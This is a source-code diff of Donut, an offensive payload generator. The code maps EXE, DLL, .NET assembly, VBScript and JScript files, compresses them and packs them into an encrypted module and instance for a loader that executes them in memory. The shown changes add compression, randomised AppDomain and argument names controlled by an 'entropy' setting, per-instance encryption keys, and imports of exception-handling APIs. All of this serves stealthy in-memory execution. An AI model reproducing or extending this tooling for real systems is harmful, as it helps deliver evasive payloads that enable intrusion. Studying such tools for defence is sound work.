106 {NTDLL_DLL, "NtContinue"},
107 {KERNEL32_DLL, "AddVectoredExceptionHandler"},
108 {KERNEL32_DLL, "RemoveVectoredExceptionHandler"},
109
110 { NULL, NULL } // last one always contains two NULL pointers
83111 };
84112
85113 // required to load .NET assemblies
116144
117145 static GUID xIID_IActiveScriptSite = {
118146 0xdb01a1e3, 0xa42b, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
147
148 static GUID xIID_IActiveScriptSiteWindow = {
149 0xd10f6761, 0x83e9, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
119150
120151 static GUID xIID_IActiveScriptParse32 = {
121152 0xbb1a2ae2, 0xa4f9, 0x11cf, {0x8f, 0x20, 0x00, 0x80, 0x5f, 0x2c, 0xd0, 0x64}};
129160 static GUID xCLSID_JScript = {
130161 0xF414C260, 0x6AC0, 0x11CF, {0xB6, 0xD1, 0x00, 0xAA, 0x00, 0xBB, 0xBB, 0x58}};
131162
132 // required to load XSL files
133 static GUID xCLSID_DOMDocument30 = {
134 0xf5078f32, 0xc551, 0x11d3, {0x89, 0xb9, 0x00, 0x00, 0xf8, 0x1f, 0xe2, 0x21}};
135
136 static GUID xIID_IXMLDOMDocument = {
137 0x2933BF81, 0x7B36, 0x11D2, {0xB2, 0x0E, 0x00, 0xC0, 0x4F, 0x98, 0x3E, 0x60}};
138
139 static GUID xIID_IXMLDOMNode = {
140 0x2933bf80, 0x7b36, 0x11d2, {0xb2, 0x0e, 0x00, 0xc0, 0x4f, 0x98, 0x3e, 0x60}};
141
142 #if defined(_WIN32) | defined(_WIN64)
143 #include "include/mmap-windows.c"
144 #ifdef _MSC_VER
145 #define strcasecmp stricmp
146 #endif
147 #endif
163 // where to store information about input file
164 file_info fi;
148165
149166 // return pointer to DOS header
150167 static PIMAGE_DOS_HEADER DosHdr(void *map) {
192209 return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE;
193210 }
194211
195 static ULONG64 rva2ofs (void *base, DWORD rva) {
212 static ULONG64 rva2ofs (void *base, ULONG64 rva) {
196213 DWORD i;
197214 ULONG64 ofs;
198215 PIMAGE_DOS_HEADER dos;
201218
202219 dos = (PIMAGE_DOS_HEADER)base;
203220 nt = (PIMAGE_NT_HEADERS)((PBYTE)base + dos->e_lfanew);
204 sh = IMAGE_FIRST_SECTION(nt);
205
206 for (i=0; i<nt->FileHeader.NumberOfSections; i++) {
207 if (rva >= sh[i].VirtualAddress &&
208 rva < sh[i].VirtualAddress + sh[i].SizeOfRawData) {
221 sh = (PIMAGE_SECTION_HEADER)
222 ((PBYTE)&nt->OptionalHeader + nt->FileHeader.SizeOfOptionalHeader);
223
224 for (i=0; i<nt->FileHeader.NumberOfSections; i++) {
225 if ((rva >= sh[i].VirtualAddress) &&
226 (rva < (sh[i].VirtualAddress + sh[i].SizeOfRawData))) {
209227
210228 ofs = sh[i].PointerToRawData + (rva - sh[i].VirtualAddress);
211229 return ofs;
214232 return -1;
215233 }
216234
217 // map a file into memory for reading
218 static int map_file(const char *path, file_info *fi) {
235 #ifdef WINDOWS
236 #include "mmap-windows.c"
237 #endif
238
239 /**
240 * Function: map_file
241 * ----------------------------
242 * Open and map the contents of file into memory.
243 *
244 * INPUT : path = file to map
245 *
246 * OUTPUT : Donut error code.
247 */
248 static int map_file(const char *path) {
219249 struct stat fs;
220250
221 DPRINT("Reading size of file : %s", path);
251 DPRINT("Entering.");
252
222253 if(stat(path, &fs) != 0) {
254 DPRINT("Unable to read size of file : %s", path);
223255 return DONUT_ERROR_FILE_NOT_FOUND;
224256 }
225257
226258 if(fs.st_size == 0) {
259 DPRINT("File appears to be empty!");
227260 return DONUT_ERROR_FILE_EMPTY;
228261 }
229
230 DPRINT("Opening %s", path);
231 fi->fd = open(path, O_RDONLY);
232
233 if(fi->fd < 0) {
262
263 fi.fd = open(path, O_RDONLY);
264
265 if(fi.fd < 0) {
266 DPRINT("Unable to open %s for reading.", path);
234267 return DONUT_ERROR_FILE_ACCESS;
235268 }
236269
237 fi->size = fs.st_size;
238
239 // map into memory
240 DPRINT("Mapping %" PRIi64 " bytes for %s", fi->size, path);
241 fi->map = mmap(NULL, fi->size,
242 PROT_READ, MAP_PRIVATE, fi->fd, 0);
270 fi.len = fs.st_size;
271
272 fi.data = mmap(NULL, fi.len, PROT_READ, MAP_PRIVATE, fi.fd, 0);
243273
244274 // no mapping? close file
245 if(fi->map == NULL) {
246 close(fi->fd);
247 fi->map = NULL;
275 if(fi.data == NULL) {
276 DPRINT("Unable to map file : %s", path);
277 close(fi.fd);
248278 return DONUT_ERROR_NO_MEMORY;
249279 }
250 return DONUT_ERROR_SUCCESS;
251 }
252
253 // unmap a file from memory previously opened with map_file()
254 static int unmap_file(file_info *fi) {
255
256 if(fi == NULL) return 0;
257
258 DPRINT("Unmapping");
259 munmap(fi->map, fi->size);
260
261 DPRINT("Closing");
262 close(fi->fd);
263
264 return 1;
265 }
266
267 static int get_file_info(const char *path, file_info *fi) {
268 PIMAGE_NT_HEADERS nt;
269 PIMAGE_DATA_DIRECTORY dir;
270 PMDSTORAGESIGNATURE pss;
271 PIMAGE_COR20_HEADER cor;
272 DWORD dll, rva, ofs, cpu;
273 PCHAR ext;
274 int err = DONUT_ERROR_SUCCESS;
275
280 return DONUT_ERROR_OK;
281 }
282
283 /**
284 * Function: unmap_file
285 * ----------------------------
286 * Releases memory allocated for file and closes descriptor.
287 *
288 * INPUT : Nothing
289 *
290 * OUTPUT : Donut error code
291 */
292 static int unmap_file(void) {
293
294 if(fi.zdata != NULL) {
295 DPRINT("Releasing compressed data.");
296 free(fi.zdata);
297 fi.zdata = NULL;
298 }
299 if(fi.data != NULL) {
300 DPRINT("Unmapping input file.");
301 munmap(fi.data, fi.len);
302 fi.data = NULL;
303 }
304 if(fi.fd != 0) {
305 DPRINT("Closing input file.");
306 close(fi.fd);
307 fi.fd = 0;
308 }
309 return DONUT_ERROR_OK;
310 }
311
312 // only included for executable generator or debug build
313 #if defined(DONUT_EXE) || defined(DEBUG)
314 /**
315 * Function: file_diff
316 * ----------------------------
317 * Calculates the ratio between two lengths for compression and decompression.
318 *
319 * INPUT : new_len = new length
320 * : old_len = old length
321 *
322 * OUTPUT : ratio as a percentage
323 */
324 static uint32_t file_diff(uint32_t new_len, uint32_t old_len) {
325 if (new_len <= UINT_MAX / 100) {
326 new_len *= 100;
327 } else {
328 old_len /= 100;
329 }
330 if (old_len == 0) {
331 old_len = 1;
332 }
333 return (100 - (new_len / old_len));
334 }
335 #endif
336
337 /**
338 * Function: compress_file
339 * ----------------------------
340 * Compresses the input file based on engine selected by user
341 *
342 * INPUT : Pointer to Donut configuration.
343 *
344 * OUTPUT : Donut error code.
345 */
346 int compress_file(PDONUT_CONFIG c) {
347 int err = DONUT_ERROR_OK;
348
349 // RtlCompressBuffer is only available on Windows
350 #ifdef WINDOWS
351 typedef NTSTATUS (WINAPI *RtlGetCompressionWorkSpaceSize_t)(
352 USHORT CompressionFormatAndEngine,
353 PULONG CompressBufferWorkSpaceSize,
354 PULONG CompressFragmentWorkSpaceSize);
355
356 typedef NTSTATUS (WINAPI *RtlCompressBuffer_t)(
357 USHORT CompressionFormatAndEngine,
358 PUCHAR UncompressedBuffer,
359 ULONG UncompressedBufferSize,
360 PUCHAR CompressedBuffer,
361 ULONG CompressedBufferSize,
362 ULONG UncompressedChunkSize,
363 PULONG FinalCompressedSize,
364 PVOID WorkSpace);
365
366 ULONG wspace, fspace;
367 NTSTATUS nts;
368 PVOID ws;
369 HMODULE m;
370 RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
371 RtlCompressBuffer_t RtlCompressBuffer;
372
373 // compress file using RtlCompressBuffer?
374 if(c->compress == DONUT_COMPRESS_LZNT1 ||
375 c->compress == DONUT_COMPRESS_XPRESS)
376 {
377 m = GetModuleHandle("ntdll");
378 RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
379 RtlCompressBuffer = (RtlCompressBuffer_t)GetProcAddress(m, "RtlCompressBuffer");
380
381 if(RtlGetCompressionWorkSpaceSize == NULL || RtlCompressBuffer == NULL) {
382 DPRINT("Unable to resolve compression API");
383 return DONUT_ERROR_COMPRESSION;
384 }
385
386 DPRINT("Reading fragment and workspace size");
387 nts = RtlGetCompressionWorkSpaceSize(
388 (c->compress - 1) | COMPRESSION_ENGINE_MAXIMUM,
389 &wspace, &fspace);
390
391 if(nts == 0) {
392 DPRINT("workspace size : %"PRId32" | fragment size : %"PRId32, wspace, fspace);
393 ws = malloc(wspace);
394 if(ws != NULL) {
395 DPRINT("Allocating memory for compressed data.");
396 fi.zdata = malloc(fi.len);
397 if(fi.zdata != NULL) {
398 DPRINT("Compressing %p to %p with RtlCompressBuffer(%s)",
399 fi.data, fi.zdata,
400 c->compress == DONUT_COMPRESS_LZNT1 ? "LZNT" : "XPRESS");
401
402 nts = RtlCompressBuffer(
403 (c->compress - 1) | COMPRESSION_ENGINE_MAXIMUM,
404 fi.data, fi.len, fi.zdata, fi.len, 0,
405 (PULONG)&fi.zlen, ws);
406
407 if(nts != 0) {
408 DPRINT("NTSTATUS : %lx", nts);
409 err = DONUT_ERROR_COMPRESSION;
410 }
411 } else err = DONUT_ERROR_NO_MEMORY;
412 free(ws);
413 } else err = DONUT_ERROR_NO_MEMORY;
414 } else err = DONUT_ERROR_COMPRESSION;
415 }
416 #endif
417 if(c->compress == DONUT_COMPRESS_APLIB) {
418 DPRINT("Obtaining size of compressed data from aP_max_packed_size() and allocating memory");
419 fi.zdata = malloc(aP_max_packed_size(fi.len));
420 if(fi.zdata != NULL) {
421 DPRINT("Obtaining size of work memory from aP_workmem_size() and allocating memory");
422 uint8_t *workmem = malloc(aP_workmem_size(fi.len));
423 if(workmem != NULL) {
424 DPRINT("Compressing with aP_pack()");
425 fi.zlen = aP_pack(fi.data, fi.zdata, fi.len, workmem, NULL, NULL);
426
427 if(fi.zlen == APLIB_ERROR) err = DONUT_ERROR_COMPRESSION;
428 free(workmem);
429 } else err = DONUT_ERROR_NO_MEMORY;
430 } else err = DONUT_ERROR_NO_MEMORY;
431 }
432
433 // if compression is specified
434 if(err == DONUT_ERROR_OK && c->compress != DONUT_COMPRESS_NONE) {
435 // set the compressed length in configuration
436 c->zlen = fi.zlen;
437 DPRINT("Original file size : %"PRId32 " | Compressed : %"PRId32, fi.len, fi.zlen);
438 DPRINT("File size reduced by %"PRId32"%%", file_diff(fi.zlen, fi.len));
439 }
440 DPRINT("Leaving with error : %" PRId32, err);
441 return err;
442 }
443
444 /**
445 * Function: read_file_info
446 * ----------------------------
447 * Reads information about the input file.
448 *
449 * INPUT : Pointer to Donut configuration.
450 *
451 * OUTPUT : Donut error code.
452 */
453 static int read_file_info(PDONUT_CONFIG c) {
454 PIMAGE_NT_HEADERS nt;
455 PIMAGE_DATA_DIRECTORY dir;
456 PMDSTORAGESIGNATURE pss;
457 PIMAGE_COR20_HEADER cor;
458 DWORD dll, rva, cpu;
459 ULONG64 ofs;
460 PCHAR ext;
461 int err = DONUT_ERROR_OK;
462
276463 DPRINT("Entering.");
277464
278465 // invalid parameters passed?
279 if(path == NULL || fi == NULL) {
466 if(c->input[0] == 0) {
467 DPRINT("No input file provided.");
280468 return DONUT_ERROR_INVALID_PARAMETER;
281469 }
282 // zero initialize file_info structure
283 memset(fi, 0, sizeof(file_info));
284
285 DPRINT("Checking extension of %s", path);
286 ext = strrchr(path, '.');
470
471 DPRINT("Checking extension of %s", c->input);
472 ext = strrchr(c->input, '.');
287473
288474 // no extension? exit
289475 if(ext == NULL) {
476 DPRINT("Input file has no extension.");
290477 return DONUT_ERROR_FILE_INVALID;
291478 }
292479 DPRINT("Extension is \"%s\"", ext);
293480
294481 // VBScript?
295482 if (strcasecmp(ext, ".vbs") == 0) {
296 DPRINT("Module is VBS");
297 fi->type = DONUT_MODULE_VBS;
298 fi->arch = DONUT_ARCH_ANY;
483 DPRINT("File is VBS");
484 fi.type = DONUT_MODULE_VBS;
485 fi.arch = DONUT_ARCH_ANY;
299486 } else
300487 // JScript?
301488 if (strcasecmp(ext, ".js") == 0) {
302 DPRINT("Module is JS");
303 fi->type = DONUT_MODULE_JS;
304 fi->arch = DONUT_ARCH_ANY;
489 DPRINT("File is JS");
490 fi.type = DONUT_MODULE_JS;
491 fi.arch = DONUT_ARCH_ANY;
305492 } else
306 // XSL?
307 if (strcasecmp(ext, ".xsl") == 0) {
308 DPRINT("Module is XSL");
309 fi->type = DONUT_MODULE_XSL;
310 fi->arch = DONUT_ARCH_ANY;
311 } else
312493 // EXE?
313494 if (strcasecmp(ext, ".exe") == 0) {
314 DPRINT("Module is EXE");
315 fi->type = DONUT_MODULE_EXE;
495 DPRINT("File is EXE");
496 fi.type = DONUT_MODULE_EXE;
316497 } else
317498 // DLL?
318499 if (strcasecmp(ext, ".dll") == 0) {
319 DPRINT("Module is DLL");
320 fi->type = DONUT_MODULE_DLL;
500 DPRINT("File is DLL");
501 fi.type = DONUT_MODULE_DLL;
321502 } else {
322 // unrecognized extension
503 DPRINT("Don't recognize file extension.");
323504 return DONUT_ERROR_FILE_INVALID;
324505 }
325506
326 DPRINT("Mapping %s into memory", path);
327
328 err = map_file(path, fi);
329 if(err != DONUT_ERROR_SUCCESS) return err;
507 DPRINT("Mapping %s into memory", c->input);
508
509 err = map_file(c->input);
510 if(err != DONUT_ERROR_OK) return err;
330511
331512 // file is EXE or DLL?
332 if(fi->type == DONUT_MODULE_DLL ||
333 fi->type == DONUT_MODULE_EXE)
513 if(fi.type == DONUT_MODULE_DLL ||
514 fi.type == DONUT_MODULE_EXE)
334515 {
335 DPRINT("Checking DOS header");
336
337 if(!valid_dos_hdr(fi->map)) {
516 if(!valid_dos_hdr(fi.data)) {
517 DPRINT("EXE/DLL has no valid DOS header.");
338518 err = DONUT_ERROR_FILE_INVALID;
339519 goto cleanup;
340520 }
341 DPRINT("Checking NT header");
342
343 if(!valid_nt_hdr(fi->map)) {
521
522 if(!valid_nt_hdr(fi.data)) {
523 DPRINT("EXE/DLL has no valid NT header.");
344524 err = DONUT_ERROR_FILE_INVALID;
345525 goto cleanup;
346526 }
347 DPRINT("Checking IMAGE_DATA_DIRECTORY");
348
349 dir = Dirs(fi->map);
527
528 dir = Dirs(fi.data);
350529
351530 if(dir == NULL) {
531 DPRINT("EXE/DLL has no valid image directories.");
352532 err = DONUT_ERROR_FILE_INVALID;
353533 goto cleanup;
354534 }
355535 DPRINT("Checking characteristics");
356536
357 nt = NtHdr(fi->map);
537 nt = NtHdr(fi.data);
358538 dll = nt->FileHeader.Characteristics & IMAGE_FILE_DLL;
359 cpu = is32(fi->map);
539 cpu = is32(fi.data);
360540 rva = dir[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress;
361541
362542 // set the CPU architecture for file
363 fi->arch = cpu ? DONUT_ARCH_X86 : DONUT_ARCH_X64;
543 fi.arch = cpu ? DONUT_ARCH_X86 : DONUT_ARCH_X64;
364544
365545 // if COM directory present
366546 if(rva != 0) {
367 DPRINT("COM Directory found");
547 DPRINT("COM Directory found indicates .NET assembly.");
368548
369 // set type to EXE or DLL assembly
370 fi->type = (dll) ? DONUT_MODULE_NET_DLL : DONUT_MODULE_NET_EXE;
371
372 // try read the runtime version from meta header
373 strncpy(fi->ver, "v4.0.30319", DONUT_VER_LEN - 1);
374
375 ofs = rva2ofs(fi->map, rva);
376 if (ofs != -1) {
377 cor = (PIMAGE_COR20_HEADER)(ofs + fi->map);
378 rva = cor->MetaData.VirtualAddress;
379 if(rva != 0) {
380 ofs = rva2ofs(fi->map, rva);
381 if(ofs != -1) {
382 pss = (PMDSTORAGESIGNATURE)(ofs + fi->map);
383 DPRINT("Runtime version : %s", (char*)pss->pVersion);
384 strncpy(fi->ver, (char*)pss->pVersion, DONUT_VER_LEN - 1);
549 // if it has an export address table, we assume it's a .NET
550 // mixed assembly. curently unsupported by the PE loader.
551 if(dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress != 0) {
552 DPRINT("File looks like a mixed (native and managed) assembly.");
553 err = DONUT_ERROR_MIXED_ASSEMBLY;
554 goto cleanup;
555 } else {
556 // set type to EXE or DLL assembly
557 fi.type = (dll) ? DONUT_MODULE_NET_DLL : DONUT_MODULE_NET_EXE;
558
559 // try read the runtime version from meta header
560 strncpy(fi.ver, "v4.0.30319", DONUT_VER_LEN - 1);
561
562 ofs = rva2ofs(fi.data, rva);
563 if (ofs != -1) {
564 cor = (PIMAGE_COR20_HEADER)(ofs + fi.data);
565 rva = cor->MetaData.VirtualAddress;
566 if(rva != 0) {
567 ofs = rva2ofs(fi.data, rva);
568 if(ofs != -1) {
569 pss = (PMDSTORAGESIGNATURE)(ofs + fi.data);
570 DPRINT("Runtime version : %s", (char*)pss->pVersion);
571 strncpy(fi.ver, (char*)pss->pVersion, DONUT_VER_LEN - 1);
572 }
385573 }
386574 }
387575 }
388576 }
389577 }
578 // assign length of file and type to configuration
579 c->len = fi.len;
580 c->mod_type = fi.type;
390581 cleanup:
391 if(err != DONUT_ERROR_SUCCESS) {
392 unmap_file(fi);
393 }
394 DPRINT("Leaving.");
582 if(err != DONUT_ERROR_OK) {
583 DPRINT("Unmapping input file due to errors.");
584 unmap_file();
585 }
586 DPRINT("Leaving with error : %" PRId32, err);
395587 return err;
396588 }
397589
398 // check if DLL exports function name
399 static int is_dll_export(file_info *fi, const char *function) {
400 PIMAGE_DATA_DIRECTORY dir;
401 PIMAGE_EXPORT_DIRECTORY exp;
402 DWORD rva, ofs, cnt;
403 PDWORD sym;
404 PCHAR str;
405 int found = 0;
406
407 DPRINT("Entering.");
408
409 dir = Dirs(fi->map);
410 if(dir != NULL) {
411 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
412 DPRINT("EAT VA : %lx", rva);
413 if(rva != 0) {
414 ofs = rva2ofs(fi->map, rva);
415 if(ofs != -1) {
416 exp = (PIMAGE_EXPORT_DIRECTORY)(fi->map + ofs);
417 cnt = exp->NumberOfNames;
418 DPRINT("Number of exported functions : %lx", cnt);
419
420 if(cnt != 0) {
421 sym = (PDWORD)(rva2ofs(fi->map, exp->AddressOfNames) + fi->map);
422 // scan array for symbol
423 do {
424 str = (PCHAR)(rva2ofs(fi->map, sym[cnt - 1]) + fi->map);
425 DPRINT("Checking %s", str);
426 // if match found, exit
427 if(strcmp(str, function) == 0) {
428 DPRINT("Found API");
429 found = 1;
430 break;
431 }
432 } while (--cnt);
433 }
434 }
435 }
436 }
437 DPRINT("Leaving.");
438 return found;
439 }
440
441 // returns 1 on success else <=0
442 static int CreateRandom(void *buf, uint64_t len) {
443
590 /**
591 * Function: gen_random
592 * ----------------------------
593 * Generates pseudo-random bytes.
594 *
595 * INPUT : buf = where to store random bytes.
596 * : len = length of random bytes to generate.
597 *
598 * OUTPUT : 1 if ok, else 0
599 */
600 static int gen_random(void *buf, uint64_t len) {
444601 #if defined(WINDOWS)
445602 HCRYPTPROV prov;
446603 int ok;
448605 // 1. acquire crypto context
449606 if(!CryptAcquireContext(
450607 &prov, NULL, NULL,
451 PROV_RSA_AES,
608 PROV_RSA_FULL,
452609 CRYPT_VERIFYCONTEXT | CRYPT_SILENT)) return 0;
453610
454611 ok = (int)CryptGenRandom(prov, (DWORD)len, buf);
474631 #endif
475632 }
476633
477 // Generate a random string, not exceeding DONUT_MAX_NAME bytes
478 // tbl is from https://stackoverflow.com/a/27459196
479 static int GenRandomString(void *output, uint64_t len) {
634 /**
635 * Function: gen_random_string
636 * ----------------------------
637 * Generates a pseudo-random string
638 *
639 * INPUT : output = pointer to buffer that receives string
640 * : len = length of string to generate
641 *
642 * OUTPUT : 1 if ok, else 0
643 */
644 static int gen_random_string(void *output, uint64_t len) {
480645 uint8_t rnd[DONUT_MAX_NAME];
481646 int i;
482 char tbl[]="HMN34P67R9TWCXYF";
647 char tbl[]="HMN34P67R9TWCXYF"; // https://stackoverflow.com/a/27459196
483648 char *str = (char*)output;
484649
485650 if(len == 0 || len > (DONUT_MAX_NAME - 1)) return 0;
486651
487652 // generate DONUT_MAX_NAME random bytes
488 if(!CreateRandom(rnd, DONUT_MAX_NAME)) return 0;
653 if(!gen_random(rnd, DONUT_MAX_NAME)) return 0;
489654
490655 // generate a string using unambiguous characters
491656 for(i=0; i<len; i++) {
495660 return 1;
496661 }
497662
498 // cheapo conversion from utf8 to utf16
499 static uint64_t utf8_to_utf16(void* dst, const char* src) {
500 uint16_t *out = (uint16_t*)dst;
501 uint64_t i;
502
503 for(i=0; src[i] != 0; i++) {
504 out[i] = src[i];
505 }
506 return i;
507 }
508
509 static int CreateModule(PDONUT_CONFIG c, file_info *fi) {
510 PDONUT_MODULE mod = NULL;
511 uint64_t len = 0;
512 char *param, parambuf[DONUT_MAX_NAME*DONUT_MAX_PARAM+DONUT_MAX_PARAM];
513 int cnt, err=DONUT_ERROR_SUCCESS;
663 /**
664 * Function: build_module
665 * ----------------------------
666 * Create a Donut module from Donut configuration
667 *
668 * INPUT : A pointer to a donut configuration
669 *
670 * OUTPUT : Donut error code.
671 */
672 static int build_module(PDONUT_CONFIG c) {
673 PDONUT_MODULE mod = NULL;
674 uint32_t mod_len, data_len;
675 void *data;
676 int err = DONUT_ERROR_OK;
514677
515678 DPRINT("Entering.");
516679
680 // Compress the input file?
681 if(c->compress != DONUT_COMPRESS_NONE) {
682 err = compress_file(c);
683
684 if(err != DONUT_ERROR_OK) {
685 DPRINT("compress_file() failed");
686 return err;
687 }
688 DPRINT("Assigning %"PRIi32 " bytes of %p to data", fi.zlen, fi.zdata);
689 data = fi.zdata;
690 data_len = fi.zlen;
691 } else {
692 DPRINT("Assigning %"PRIi32 " bytes of %p to data", fi.len, fi.data);
693 data = fi.data;
694 data_len = fi.len;
695 }
517696 // Allocate memory for module information and contents of file
518 len = sizeof(DONUT_MODULE) + fi->size;
519 DPRINT("Allocating %" PRIi64 " bytes of memory for DONUT_MODULE", len);
520 mod = calloc(len, 1);
697 mod_len = data_len + sizeof(DONUT_MODULE);
698
699 DPRINT("Allocating %" PRIi32 " bytes of memory for DONUT_MODULE", mod_len);
700 mod = calloc(mod_len, 1);
521701
522702 // Memory not allocated? exit
523703 if(mod == NULL) {
704 DPRINT("calloc() failed");
524705 return DONUT_ERROR_NO_MEMORY;
525706 }
526707
527 // Set the type of module
528 mod->type = fi->type;
529
708 // Set the module info
709 mod->type = fi.type;
710 mod->thread = c->thread;
711 mod->compress = c->compress;
712 mod->unicode = c->unicode;
713 mod->zlen = fi.zlen;
714 mod->len = fi.len;
715
530716 // DotNet assembly?
531717 if(mod->type == DONUT_MODULE_NET_DLL ||
532718 mod->type == DONUT_MODULE_NET_EXE)
533719 {
534 // If no domain name specified, generate a random one
720 // If no domain name specified in configuration
535721 if(c->domain[0] == 0) {
536 if(!GenRandomString(c->domain, DONUT_DOMAIN_LEN)) {
537 err = DONUT_ERROR_RANDOM;
538 goto cleanup;
722 // if entropy is enabled
723 if(c->entropy != DONUT_ENTROPY_NONE) {
724 // generate a random name
725 if(!gen_random_string(c->domain, DONUT_DOMAIN_LEN)) {
726 DPRINT("gen_random_string() failed");
727 err = DONUT_ERROR_RANDOM;
728 goto cleanup;
729 }
539730 }
540731 }
541 // convert to unicode format.
542 // wchar_t is 32-bits on linux, but 16-bit on windows. :-|
543 DPRINT("Domain : %s", c->domain);
544 utf8_to_utf16(mod->domain, c->domain);
545
732 DPRINT("Domain : %s", c->domain[0] == 0 ? "Default" : c->domain);
733 if(c->domain[0] != 0) {
734 // Set the domain name in module
735 strncpy(mod->domain, c->domain, DONUT_DOMAIN_LEN);
736 } else {
737 memset(mod->domain, 0, DONUT_DOMAIN_LEN);
738 }
546739 // Assembly is DLL? Copy the class and method
547740 if(mod->type == DONUT_MODULE_NET_DLL) {
548741 DPRINT("Class : %s", c->cls);
549 utf8_to_utf16(mod->cls, c->cls);
742 strncpy(mod->cls, c->cls, DONUT_MAX_NAME-1);
550743
551744 DPRINT("Method : %s", c->method);
552 utf8_to_utf16(mod->method, c->method);
745 strncpy(mod->method, c->method, DONUT_MAX_NAME-1);
553746 }
554747 // If no runtime specified in configuration, use version from assembly
555748 if(c->runtime[0] == 0) {
556 strncpy(c->runtime, fi->ver, DONUT_MAX_NAME-1);
749 strncpy(c->runtime, fi.ver, DONUT_MAX_NAME-1);
557750 }
558751 DPRINT("Runtime : %s", c->runtime);
559 utf8_to_utf16(mod->runtime, c->runtime);
752 strncpy(mod->runtime, c->runtime, DONUT_MAX_NAME-1);
560753 } else
561 // Unmanaged DLL? check for exported api
562 if(mod->type == DONUT_MODULE_DLL &&
563 c->method[0] != 0)
564 {
754 // Unmanaged DLL? copy function name to module
755 if(mod->type == DONUT_MODULE_DLL && c->method[0] != 0) {
565756 DPRINT("DLL function : %s", c->method);
566 strncpy((char*)mod->method, c->method, DONUT_MAX_NAME-1);
757 strncpy(mod->method, c->method, DONUT_MAX_NAME-1);
567758 }
568759
569760 // Parameters specified?
570 if(c->param[0] != 0) {
571 strncpy(parambuf, c->param, sizeof(parambuf)-1);
572 cnt = 0;
573 // Split by comma or semi-colon
574 param = strtok(parambuf, ",;");
575
576 while(param != NULL && cnt < DONUT_MAX_PARAM) {
577 if(strlen(param) >= DONUT_MAX_NAME) {
578 DPRINT("Parameter : \"%s\" exceeds DONUT_MAX_PARAM(%i)",
579 param, DONUT_MAX_NAME);
580 err = DONUT_ERROR_INVALID_PARAMETER;
581 goto cleanup;
761 if(c->args[0] != 0) {
762 // If file type is unmanaged EXE
763 if(mod->type == DONUT_MODULE_EXE) {
764 // If entropy is disabled
765 if(c->entropy == DONUT_ENTROPY_NONE) {
766 // Set to "AAAA"
767 memset(mod->args, 'A', 4);
768 } else {
769 // Generate 4-byte random name
770 if(!gen_random_string(mod->args, 4)) {
771 DPRINT("gen_random_string() failed");
772 err = DONUT_ERROR_RANDOM;
773 goto cleanup;
774 }
582775 }
583 DPRINT("Adding \"%s\"", param);
584 // convert ansi string to wide character string
585 utf8_to_utf16(mod->param[cnt++], param);
586
587 // get next parameter
588 param = strtok(NULL, ",;");
589 }
590 // set number of parameters
591 mod->param_cnt = cnt;
592 }
593
594 // set length of module data
595 mod->len = fi->size;
596 // read module into memory
597 memcpy(&mod->data, fi->map, fi->size);
776 // Add space
777 mod->args[4] = ' ';
778 }
779 //
780 // Copy parameters
781 strncat(mod->args, c->args, DONUT_MAX_NAME-6);
782 }
783 DPRINT("Copying data to module");
784
785 memcpy(&mod->data, data, data_len);
598786 // update configuration with pointer to module
599787 c->mod = mod;
600 c->mod_len = len;
601
788 c->mod_len = mod_len;
602789 cleanup:
603790 // if there was an error, free memory for module
604 if(err != DONUT_ERROR_SUCCESS && mod != NULL) {
791 if(err != DONUT_ERROR_OK) {
792 DPRINT("Releasing memory due to errors.");
605793 free(mod);
606 c->mod = NULL;
607 c->mod_len = 0;
608 }
609 DPRINT("Leaving.");
794 }
795 DPRINT("Leaving with error : %" PRId32, err);
610796 return err;
611797 }
612798
613 static int CreateInstance(PDONUT_CONFIG c, file_info *fi) {
799 /**
800 * Function: build_instance
801 * ----------------------------
802 * Creates the data necessary for main loader to execute VBS/JS/EXE/DLL files in memory.
803 *
804 * INPUT : Pointer to a Donut configuration.
805 *
806 * OUTPUT : Donut error code.
807 */
808 static int build_instance(PDONUT_CONFIG c) {
614809 DONUT_CRYPT inst_key, mod_key;
615 PDONUT_INSTANCE inst;
616 uint64_t inst_len;
810 PDONUT_INSTANCE inst = NULL;
811 int cnt, inst_len;
617812 uint64_t dll_hash;
618 int cnt;
813 int err = DONUT_ERROR_OK;
619814
620815 DPRINT("Entering.");
621816
622817 // Allocate memory for the size of instance based on the type
623 DPRINT("Allocating space for instance");
818 DPRINT("Allocating memory for instance");
624819 inst_len = sizeof(DONUT_INSTANCE);
625820
626 // if this is a PIC instance, add the size of module
821 // if the module is embedded, add the size of module
627822 // that will be appended to the end of structure
628 if(c->inst_type == DONUT_INSTANCE_PIC) {
629 DPRINT("The size of module is %" PRIi64 " bytes. "
823 if(c->inst_type == DONUT_INSTANCE_EMBED) {
824 DPRINT("The size of module is %" PRIi32 " bytes. "
630825 "Adding to size of instance.", c->mod_len);
631826 inst_len += c->mod_len;
632827 }
828 DPRINT("Total length of instance : %"PRIi32, inst_len);
829
633830 // allocate zero-initialized memory for instance
634831 inst = (PDONUT_INSTANCE)calloc(inst_len, 1);
635
832
636833 // Memory allocation failed? exit
637834 if(inst == NULL) {
835 DPRINT("Memory allocation failed");
638836 return DONUT_ERROR_NO_MEMORY;
639837 }
640838
641 #if !defined(NOCRYPTO)
642 DPRINT("Generating random key for instance");
643 if(!CreateRandom(&inst_key, sizeof(DONUT_CRYPT))) {
644 return DONUT_ERROR_RANDOM;
645 }
646 memcpy(&inst->key, &inst_key, sizeof(DONUT_CRYPT));
647
648 DPRINT("Generating random key for module");
649 if(!CreateRandom(&mod_key, sizeof(DONUT_CRYPT))) {
650 return DONUT_ERROR_RANDOM;
651 }
652 memcpy(&inst->mod_key, &mod_key, sizeof(DONUT_CRYPT));
653
654 DPRINT("Generating random string to verify decryption");
655 if(!GenRandomString(inst->sig, DONUT_SIG_LEN)) {
656 return DONUT_ERROR_RANDOM;
657 }
658 #endif
659
660 DPRINT("Generating random IV for Maru hash");
661 if(!CreateRandom(&inst->iv, MARU_IV_LEN)) {
662 return DONUT_ERROR_RANDOM;
663 }
664
665 DPRINT("Generating hashes for API using IV: %" PRIx64, inst->iv);
839 // set the length of instance and pointer to it in configuration
840 c->inst = inst;
